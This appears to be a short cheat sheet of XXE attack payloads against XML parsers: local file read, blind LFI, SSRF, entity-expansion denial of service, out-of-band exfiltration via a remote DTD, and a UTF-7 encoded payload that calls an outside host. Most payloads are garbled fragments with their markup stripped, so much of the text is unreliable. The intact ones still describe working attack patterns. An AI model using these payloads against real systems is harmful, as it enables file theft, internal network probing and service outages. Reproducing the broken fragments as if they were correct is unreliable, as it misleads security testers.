**LFI Test** ``` ]>&xxe; ``` **Blind LFI test (when first case doesn't return anything)** ``` ]>&blind; ``` **Access Control bypass (loading restricted resources - PHP example)** ``` ]> ``` **SSRF Test** ``` ]>&xxe; ``` **XEE (XML Entity Expansion - DOS)** ``` ]> &lol9; ``` **XEE #2 (Remote attack - through external xml inclusion)** ``` ]> 3..2..1...&test ``` **XXE FTP HTTP Server** https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html ``` %remote; %send; ]> 4 File stored on http://publicServer.com/parameterEntity_sendftp.dtd "> %param1; ``` **XXE UTF-7** ``` +ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 +ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ +ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 ``` To convert between UTF-8 & UTF-7 use recode. `recode UTF8..UTF7 payload-file.xml`